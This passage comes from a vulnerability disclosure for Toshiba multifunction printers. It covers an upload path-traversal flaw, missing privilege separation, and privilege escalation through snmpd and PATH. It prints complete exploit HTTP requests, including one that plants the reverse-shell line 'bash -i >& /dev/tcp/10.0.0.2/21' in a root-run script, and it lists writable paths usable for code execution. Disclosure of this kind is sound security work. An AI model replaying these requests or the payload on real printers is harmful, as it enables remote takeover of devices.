http:\/\/printer-ip\/Administration\/MetaScan\/XMLFormatFile\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/setting\/DDNSUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/ServerConnErrRegFileUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/PDLUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/ICCProfile\/ImportICCProfile.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/SystemUpdates\/nSystemUpdatesUpload.html<\/p>\n<p>All these upload functionalities are vulnerable: they allow an<br \/>attacker with admin privileges to overwrite any file present on the<br \/>printer.<\/p>\n<p>The vulnerability likely resides in the<br \/>`\/home\/SYSROM_SRC\/build\/release\/lib\/mod_contentwebserver.so.0`<br \/>library, where the `\/contentwebserver\/upload` API is implemented.<br \/>Consequently, this is a single vulnerability that is reachable through<br \/>several different upload forms.<\/p>\n<p>For example, we can see 3 different types of upload forms:<\/p>\n<p>Upload of Driver files<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>Upload of Unix filters<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>Upload of address book, mailboxes and templates<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>All of these forms are affected in the same way, by 
crafting a malicious `name` value<br \/>as shown in the next screenshot. It is possible to change the HTTP<br \/>request by modifying the name value to rewrite any file in the<br \/>printer.<\/p>\n<p>For example, it is possible to overwrite the<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver` shell<br \/>script by sending a malicious file using the name value<br \/>`\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver`:<\/p>\n<p>Upload of malicious ldapserver shell script:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is necessary to update the cookie and the CsrfpId values:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8081<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;136357212815291094282690264320<br \/>Content-Length: 1056<br \/>Origin: http:\/\/10.0.0.1:8081<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8081\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html?v=1670278837ta&amp;fileMode=3<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;<br \/>IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3; clicked=0;<br \/>addrLastVisited=FAVGRP<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br 
\/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;script.zip&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;PDPlugin&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver&#8221;;<br \/>filename=&#8221;script.zip&#8221;<br \/>Content-Type: application\/zip<\/p>\n<p>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320&#8211;<\/p>\n<p>Following this HTTP request, the file<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver` will be<br \/>overwritten with a malicious payload.<\/p>\n<p>Before the execution of the HTTP request, the file is normal:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>-rwxrwxrwx 1 root root 7007 Mar 15 11:45<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>bash-4.1# head \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>#!\/bin\/bash<br \/>LDAP_STARTUP_STATUS=0;<\/p>\n<p>function stop() {<br \/>echo &#8220;slapd is stopped&#8221;<br 
\/>kill -SIGINT `pgrep slapd`<br \/>check_stop_process<br \/>}<\/p>\n<p>function start() {<br \/>bash-4.1#<\/p>\n<p>After the execution of the HTTP request, the file has been modified.<br \/>It now contains the malicious payload:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>-rw-rw-rw- 1 apache trusted 52 May 27 16:35<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>bash-4.1# cat \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1<br \/>bash-4.1#<\/p>\n<p>Another exploitation of a different form is shown below, using the<br \/>upload of drivers. It exploits the same vulnerability. The file<br \/>`\/home\/SYSROM_SRC\/sbin\/malicious.program` will contain `test`:<\/p>\n<p>Upload of `\/home\/SYSROM_SRC\/sbin\/malicious.program`:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;8960912535828260861374302822<br \/>Content-Length: 1813<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/UnixList.html?v=1517352288ta&amp;fileMode=2<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;<br \/>TopAccessURL=http%3A\/\/10.0.0.1%3A8080\/%3FMAIN%3DTOPACCESS;<br \/>SessionID=Session_3e61919e-556b-4be7-8a18-91bb65a4752b; clicked=0;<br \/>addrLastVisited=ADDRBK; IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee<br 
\/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;aix.tar&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;Unix-Filters&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program&#8221;;<br \/>filename=&#8221;aix.tar&#8221;<br \/>Content-Type: application\/x-tar<\/p>\n<p>test<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;hpux.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;hpux64.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br 
\/>Content-Disposition: form-data; name=&#8221;linux.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;openunix.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;solaris.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822&#8211;<\/p>\n<p>And we can confirm this file has been uploaded to the printer:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/sbin\/malicious.program<br \/>-rw-rw-rw- 1 apache trusted 5 May 27 07:48<br \/>\/home\/SYSROM_SRC\/sbin\/malicious.program<br \/>bash-4.1#<\/p>\n<p>This vulnerability can be used to get Remote Code Execution in<br \/>several different ways. Due to some weaknesses found in Toshiba<br \/>printers, there are hundreds of different ways to get Remote Code<br \/>Execution. 
For example:<\/p>\n<p>* Upload of a malicious library defined in the LD_PRELOAD variable:<br \/>* \/ramdisk\/al\/libGetNameInfoInterface.so or<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so can be overwritten by a<br \/>malicious library<br \/>* Upload of a malicious library using the LD_LIBRARY_PATH variable &#8211;<br \/>An attacker can upload malicious libraries inside:<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib,<br \/>* \/mfp\/lib,<br \/>* \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib,<br \/>* \/home\/SYSROM_SRC\/build\/thirdparty\/plugins\/platforminputcontexts\/,<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib.<br \/>* Upload of a malicious program due to insecure permissions:<br \/>* As shown in Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs, a lot of programs running<br \/>as root can be overwritten due to insecure permissions (777)<br \/>* Upload a malicious Python program or a malicious Python library<br \/>* Replace Bash scripts<br \/>* &#8230;<\/p>\n<p>An attacker with admin privileges can remotely compromise any Toshiba printer.<\/p>\n<p>An attacker with admin privileges can overwrite any insecure file<br \/>(including programs running as root and Python code).<\/p>\n<p>## Details &#8211; Lack of privilege separation<\/p>\n<p>Toshiba printers do not implement privilege separation. 
An attacker<br \/>compromising a program will be able to compromise the entire printer.<\/p>\n<p>For example, all the programs, except Apache, are running as root.<\/p>\n<p>Apache is not running as root but a Local Privilege Escalation can be<br \/>achieved using one of these vulnerabilities:<\/p>\n<p>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using snmpd<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using insecure PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_PRELOAD<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_LIBRARY_PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure permissions for 106 programs<\/p>\n<p>Listing of processes on the printer:<\/p>\n<p>bash-4.1# ps auxw<br \/>USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND<br \/>root 1 0.0 0.0 1740 512 ? Ss 16:34 0:00 init [3]root 2 0.0 0.0 0 0 ? S 16:34 0:00 [kthreadd]root 3 0.0 0.0 0 0 ? S 16:34 0:00<br \/>[ksoftirqd\/0][&#8230;]root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -h ldap:\/\/127.0.0.1 -f<br \/>\/home\/SYSROM_SRC\/build\/release\/etc\/openldap\/slapd.conf -d 1<br \/>root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02<br \/>\/home\/SYSROM_SRC\/bin\/mapper firstboot=0<br \/>root 1482 0.0 0.0 26120 2628 ? Ss 16:34 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>apache 1486 0.0 0.1 1264444 3728 ? Sl 16:34 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>[&#8230;]root 1757 0.0 0.2 34388 8176 ? S 16:34 0:00<br \/>.\/cipollproc<br \/>root 1758 0.0 0.2 34432 8180 ? S&lt; 16:34 0:00<br \/>.\/ciprioritymanager<br \/>root 1785 0.3 1.9 815004 59476 ? 
Sl 16:34 0:51<br \/>.\/ebx_dl 1539 1537 1540 1 2 3 -T8<br \/>root 1786 0.0 0.5 101584 15612 ? S 16:34 0:00<br \/>.\/de_ipfax 1539 1537 1540 1 2 3 -T8<br \/>root 1803 0.0 0.3 38908 9448 ? S 16:34 0:00<br \/>.\/alnfcplugin<br \/>root 1846 0.0 0.0 15544 2788 ? S 16:34 0:00<br \/>\/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>root 1850 0.0 0.0 1744 500 ttyS0 Ss+ 16:34 0:00<br \/>\/sbin\/getty 115200 ttyS0<br \/>root 1864 0.0 0.4 46528 13060 ? S 16:34 0:00<br \/>.\/alfilestoragem -T8<br \/>root 1866 0.0 0.6 60164 18036 ? S 16:34 0:00 .\/alusermgr<br \/>root 1867 0.0 0.4 44120 14156 ? S 16:34 0:00<br \/>.\/allicensemgmt<br \/>root 1868 0.0 0.6 56792 18680 ? Sl 16:34 0:00<br \/>.\/aldeviceserviceplugin<br \/>root 1869 0.0 1.4 84708 42192 ? S 16:34 0:03<br \/>.\/aldeviceconfigplugin<br \/>root 1870 0.0 0.6 60856 20516 ? S 16:34 0:01<br \/>.\/aluserAuthMgr<br \/>root 1871 0.0 0.3 41912 11224 ? S 16:34 0:00 .\/algrpmgr<br \/>root 1872 0.0 0.4 43616 13080 ? S 16:34 0:00 .\/alrolemgr<br \/>root 1873 0.0 0.5 54708 14972 ? Sl 16:34 0:05<br \/>.\/alrestrictionmode<br \/>root 1874 0.0 0.5 61692 15364 ? Sl 16:34 0:00<br \/>.\/alsecurityconfiguration<br \/>root 1875 0.0 0.3 41408 11008 ? S 16:34 0:00<br \/>.\/alintegritychkmgr<br \/>root 1876 0.3 3.6 482584 108060 ? Sl 16:34 0:43<br \/>.\/alUiFrameWork legacy -S ramdisk<br \/>root 1877 0.0 0.9 92276 26968 ? Sl 16:34 0:01<br \/>.\/alpanel panel 49 Controller\/Settings\/autoClear<br \/>Controller\/Information\/Locale -T4<br \/>root 1878 0.0 0.4 60888 14588 ? S 16:34 0:00<br \/>.\/aljobtemplatemgr<br \/>root 1879 0.0 0.3 42492 11204 ? S 16:34 0:00<br \/>.\/alLogRetriever -T8<br \/>root 1880 0.0 0.4 49340 14248 ? S 16:34 0:00<br \/>.\/alExportImport -T8<br \/>root 1881 0.0 0.4 57852 14596 ? S 16:34 0:00<br \/>.\/aleFilingmgr -T8<br \/>root 1882 0.0 0.4 60244 13020 ? Sl 16:34 0:00<br \/>.\/alpresentationresourcemgr -T8<br \/>root 1883 0.0 0.2 35036 8340 ? S 16:34 0:00<br \/>.\/alServiceUIPlugin<br \/>root 1884 0.0 0.3 45624 10220 ? 
Sl 16:34 0:00<br \/>.\/alPanelUIMessageHandler -S ramdisk<br \/>root 1885 0.0 0.3 42016 11916 ? S 16:34 0:00<br \/>.\/alusbmscapplication<br \/>root 1886 0.0 0.4 70124 12236 ? Sl 16:34 0:00<br \/>.\/alViewPlugin<br \/>root 1887 0.0 0.4 83200 12652 ? Sl 16:34 0:00<br \/>.\/alsharedprintDp -T8<br \/>root 1888 0.0 0.7 62028 22420 ? S 16:34 0:06<br \/>.\/alnsm -d9 -m00 -T5<br \/>root 1890 0.0 0.5 128920 16292 ? Sl 16:34 0:00<br \/>.\/aljobcontroller -T8<br \/>root 1891 0.0 0.4 118216 12728 ? Sl 16:34 0:00<br \/>.\/alprintmn -T8<br \/>root 1892 0.0 0.3 49888 11220 ? Sl 16:34 0:00<br \/>.\/alreportsmsgr<br \/>root 1893 0.0 0.5 72764 17720 ? Sl 16:34 0:00<br \/>.\/alreportmanager<br \/>root 1922 0.0 0.3 46056 11236 ? S 16:34 0:00<br \/>.\/almailboxapplication<br \/>root 1923 0.0 0.4 44204 13528 ? S 16:34 0:00<br \/>.\/alsoftwareupdateclient -T8<br \/>root 1974 0.0 0.5 56496 15560 ? S 16:34 0:00<br \/>.\/alifaxreceive -T8<br \/>root 1975 0.0 0.4 47184 14844 ? S 16:34 0:00<br \/>.\/almaintenanceplugin -T6<br \/>root 1976 0.0 0.3 41416 11312 ? S 16:34 0:00<br \/>.\/alpdlfiltermanager<br \/>root 1977 0.0 0.4 51736 14524 ? S 16:34 0:00<br \/>.\/alCloning -T8<br \/>root 1978 0.0 0.3 43528 9412 ? Sl 16:34 0:00<br \/>.\/alPanelStartLEDHandler<br \/>root 1979 0.0 0.3 39964 11504 ? S 16:34 0:00<br \/>.\/alhomedatamgr<br \/>root 1980 0.0 0.6 47532 18748 ? S 16:34 0:00 .\/sim -T8<br \/>root 1981 0.0 0.7 92856 23600 ? Sl 16:34 0:01<br \/>.\/informationservice -T8<br \/>root 1982 0.0 0.2 34624 8476 ? S 16:34 0:00<br \/>.\/sljobmanagement -T8<br \/>root 1985 0.0 0.7 59792 22588 ? Sl 16:34 0:00<br \/>.\/notificationservice 1284 -T8<br \/>root 1986 0.0 0.9 87936 28716 ? Sl 16:34 0:03 .\/wfpc -T8<br \/>root 1987 0.0 0.3 35524 9156 ? S 16:34 0:00 .\/armn -T8<br \/>root 2205 0.0 0.4 59596 12808 ? Ss 16:35 0:00 .\/wfpc -T8<br \/>root 2208 0.0 0.3 59144 11220 ? Ss 16:35 0:00 .\/wfpc -T8<br \/>root 2327 0.0 0.4 55020 13452 ? 
S 16:35 0:00<br \/>.\/alAddressBookMgr<br \/>root 2328 0.0 0.5 72396 15208 ? Sl 16:35 0:00<br \/>.\/alaccountmgr<br \/>root 2426 0.0 0.3 46192 10496 ? Sl 16:35 0:00<br \/>.\/agent_scan 1282 1 -T8<br \/>root 2428 0.0 0.3 44272 9844 ? Sl 16:35 0:00<br \/>.\/agent_faxreceive 1282 2 -T8<br \/>root 2430 0.0 0.6 450116 19668 ? Sl 16:35 0:00<br \/>.\/agent_rip 1282 6 -T8<br \/>root 2432 0.0 0.3 47100 10260 ? Sl 16:35 0:00<br \/>.\/agent_print 1282 15 -T8<br \/>root 2433 0.0 0.3 44316 9816 ? Sl 16:35 0:00<br \/>.\/agent_faxtransmit 1282 16 -T8<br \/>root 2434 0.0 0.3 44296 9800 ? Sl 16:35 0:00<br \/>.\/agent_ipfaxtransmit 1282 31 -T8<br \/>root 2435 0.0 0.3 44268 9796 ? Sl 16:35 0:00<br \/>.\/agent_ipfaxreceive 1282 32 -T8<br \/>root 2515 0.0 0.4 54636 13444 ? Sl 16:35 0:00 .\/alulm<br \/>root 2516 0.0 0.3 249732 9260 ? Sl 16:35 0:00<br \/>.\/alcbamanager -S ramdisk<br \/>root 2614 0.0 0.5 183976 17564 ? Sl 16:35 0:00<br \/>.\/alappmanager<br \/>root 2870 0.0 0.4 54968 14848 ? Sl 16:35 0:00<br \/>.\/alLogmanager<br \/>root 2871 0.0 0.4 46088 13440 ? S 16:35 0:00<br \/>.\/alhddbackuprestore<br \/>[&#8230;]root 3784 0.0 0.4 45704 12760 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>root 3828 0.0 0.0 15516 2424 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/vsftpd -enableprinting<br \/>root 3860 0.1 2.3 201372 70908 ? Sl 16:35 0:25<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000000<br \/>root 3935 0.0 0.4 218132 13644 ? Sl 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100 -f<br \/>\/encryption\/al\/network\/config\/hp9100.conf<br \/>root 3970 0.1 1.6 144908 48860 ? Sl 16:35 0:24<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000001<br \/>root 3992 0.0 0.2 33948 8128 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>root 4025 0.0 0.2 34236 8920 ? 
S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>[&#8230;]\n<p>The printer does not implement separation of privileges.<\/p>\n<p>A vulnerability found inside one of the multiple components in the<br \/>printer is enough to completely compromise the security of the printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution using snmpd<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure library defined inside the<br \/>configuration of snmpd. This Local Privilege Escalation can also be<br \/>exploited as a Remote Code Execution by uploading a malicious library.<\/p>\n<p>The snmpd configuration file located at<br \/>`\/encryption\/al\/network\/config\/snmpd.conf` loads an<br \/>external, Toshiba-specific library. The code contained inside this<br \/>library will be executed as root (as snmpd is running as root).<\/p>\n<p>Content of `\/encryption\/al\/network\/config\/snmpd.conf`:<\/p>\n<p>dlmod mibs_impl<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so<\/p>\n<p>`\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so` is a symbolic link to the<br \/>`\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0` library.<\/p>\n<p>The `\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0` file has incorrect<br \/>permissions, allowing any local attacker or any remote attacker<br \/>exploiting the Pre-authenticated Remote Code Execution as root or<br \/>apache and multiple Local Privilege Escalations vulnerability to<br \/>replace this file with a malicious library.<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/lib\/libalmibs_impl.so*<br \/>lrwxrwxrwx 1 root root 19 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so -&gt; libalmibs_impl.so.0<br \/>-rwxrwxrwx 1 root root 5239499 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0<br \/>bash-4.1#<\/p>\n<p>This file will be loaded when snmpd starts. 
The snmpd program starts<br \/>during the boot of the printer and is automatically restarted when it<br \/>crashes.<\/p>\n<p>It is possible to crash the remote snmpd server using the<br \/>Pre-authenticated Remote Code Execution as root vulnerability to force<br \/>the restart of the snmpd daemon, load the malicious library and<br \/>compromise the printer.<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure PATH<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure PATH variable. This Local<br \/>Privilege Escalation can also be exploited as a Remote Code Execution<br \/>by uploading a malicious program using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>It was observed that the Toshiba printers are configured with an<br \/>insecure `$PATH` variable:<\/p>\n<p>bash-4.1# echo $PATH<br \/>\/home\/SYSROM_SRC\/build\/release\/bin:\/home\/SYSROM_SRC\/build\/release\/sbin:\/home\/SYSROM_SRC\/build\/release\/bin:<br \/>\/home\/SYSROM_SRC\/build\/release\/sbin:\/home\/SYSROM_SRC\/build\/release\/bin:\/home\/SYSROM_SRC\/build\/release\/sbin:<br \/>\/bin:\/usr\/bin:\/sbin:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin<br \/>bash-4.1#<\/p>\n<p>The `$PATH` variable contains several directories with insecure<br \/>permissions (777), allowing any attacker to plant malicious programs<br \/>that will then be executed instead of the regular programs:<\/p>\n<p>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/bin`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/sbin`<\/p>\n<p>These 2 directories are specified multiple times and are configured<br \/>with 777 permissions:<\/p>\n<p>Insecure permissions of 
`\/home\/SYSROM_SRC\/build\/release\/bin` and<br \/>`\/home\/SYSROM_SRC\/build\/release`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/bin<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 \/home\/SYSROM_SRC\/bin -&gt;<br \/>build\/release\/bin<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin<br \/>total 176508<br \/>drwxrwxrwx 2 root root 36864 Mar 15 16:12 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27 2to3 -&gt;<br \/>..\/..\/thirdparty\/bin\/2to3<br \/>lrwxrwxrwx 1 root root 29 Mar 14 16:27 2to3-3.5 -&gt;<br \/>..\/..\/thirdparty\/bin\/2to3-3.5<br \/>-rwxrwxrwx 1 root root 120381 Dec 6 01:56 ALABAMA_Large.ico<br \/>-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_Small.ico<br \/>-rwxrwxrwx 1 root root 143884 Dec 6 01:56 ALABAMA_f_Large.ico<br \/>-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_f_Small.ico<br \/>lrwxrwxrwx 1 root root 39 Mar 14 16:27<br \/>AppLicenseDataBase -&gt; ..\/..\/thirdparty\/bin\/AppLicenseDataBase<br \/>&#8230;<\/p>\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/build\/release\/sbin` and<br \/>`\/home\/SYSROM_SRC\/build\/release`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/sbin<br \/>lrwxrwxrwx 1 root root 18 Mar 14 16:34 \/home\/SYSROM_SRC\/sbin -&gt;<br \/>build\/release\/sbin<br \/>bash-4.1# ls -la 